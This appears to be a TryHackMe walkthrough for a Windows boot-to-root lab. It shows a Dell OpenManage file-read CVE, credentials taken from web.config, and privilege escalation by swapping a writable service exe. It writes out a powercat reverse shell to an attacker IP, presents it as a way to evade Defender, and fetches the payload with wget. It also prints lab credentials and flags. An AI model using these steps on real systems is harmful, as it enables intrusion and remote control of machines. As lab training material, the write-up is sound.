Tryhackme Free Boot-to-Root Room: Hack Smarter Security
Considering the room description, before we run an nmap scan we will take a look at the website
On the H4XORS FOR HIRE tab, there is a Contact Us page (which may not lead to anything)
Doesn’t look like Robots.txt exists
Per Wappalyzer, looks like a standard Windows Server hosting IIS
Running a simple dirsearch didn’t find anything useful
Decided to use the -Pn flag for the nmap scan so it did not Ping respond
Port 1311 is Dell OpenManage, so we will see what searchsploit finds
Stepping back and browsing to the url: https://<THM IP>:1311 gives us a web page
Rhino Security Labs (whom Tyler — the admin of the Hack Smart Discord server, works for) released an article regarding this application and a CVE
Able to read the win.ini file
Scrolling down, we see the following
Let’s go see what’s stored in the web.config file of the hacksmartersec site
Username: typer
Password: IAmA1337h4x0randIkn0wit!
We can just SSH in now
What is user.txt?
Answer: THM{4ll15n0tw3llw1thd3ll}
Time for some privilege escalation
Hopping over to PowerShell to see if Defender is enabled, we get an error
We can use the Get-Service option to check
We are going to have to bypass Windows Defender if we are going to gain access as Admin
Found a nice GitHub Repo for checking different items for Windows Privilege Escalation
Checking whoami /priv, doesn’t seem like anything
Nothing saved in PowerShell History
Let’s check for Unquoted Service Path Vulnerability
Trying pretty much any of the sc query options results in an Access Denied
When Googling for Windows Privilege Escalation Checker tools, I came across the following
Hopping back into PowerShell, we can use wget to pull down our file
We will run a quick check
Most of the checks come back as Informational and non-vulnerable, but scrolling down we eventually find the following
The BUILTIN\Users group has Full Control over the folder, which means they can delete the exe
PowerCat allows for evading Defender
We are also going to use an online PowerShell to EXE converter
We are going to name the exe the same
Powercat is installed on Kali, so we need to create our reverse shell PowerShell script, and that is what we will upload to PS2EXE to convert
powercat -c <Kali tun0 IP> -p <port of your choice> -e cmd -g > shell.ps1
Now we will ls shell.ps1, copy all of the code and paste it into the website
We will start our python server: python3 -m http.server <port of choice> in the same directory the spoofer exe is in
Before uploading our file, we need do a few things on the THM VM
We are going to want to check and see what reg key controls the forcible stop of a service
To add the key we will run the following
reg add "HKLM\SYSTEM\CurrentControlSet\Control"
/v WaitToKillServiceTimeout /t REG_SZ /d 1200000 /fWe can’t run this since we don’t have access yet, as soon as we get our reverse shell, then we will want to immediately run it
The things we need to do prior to uploading our exe are as follows
Step 1: Check that the spoofer-scheduler service is running
Get-Service -Name "spoofer-scheduler"
Step 2: Stop the spoofer-scheduler service
Stop-Service -Name "spoofer-scheduler"
Step 3: Verify the service has stopped successfully
Get-Service -Name "spoofer-scheduler"
Step 4: Delete the exe and verify it’s gone
Step 5: Start your netcat session on the port that was set
Now it is time to upload our malicious exe
Within PowerShell run the following wget command
wget http://<Kali tun0 IP>:<port that was set when starting python server/
spoofer-scheduler.exe -o spoofer-scheduler.exe
Now we will start the spoofer service and watch out netcat session so as soon as it connects we can copy/paste the reg add command from earlier
Start-Service -Name "spoofer-scheduler"
As you can see, it nearly instantly dies, hence why we needed the copy/paste ready
The above doesn’t seem to work sadly since we do not have the ability to reboot the machine
Since we can just keep restarting our shell, we can eventually grab the flag by pasting in the full path of the correct location
cd C:\Users\Administrator\Desktop\Hacking-Targets\Which organizations is the Hack Smarter group targeting next?
I tried tab-completing the file, but it didn’t work
Answer: CyberLens, WorkSmarter, SteelMountain
A few nice walk-through shout outs
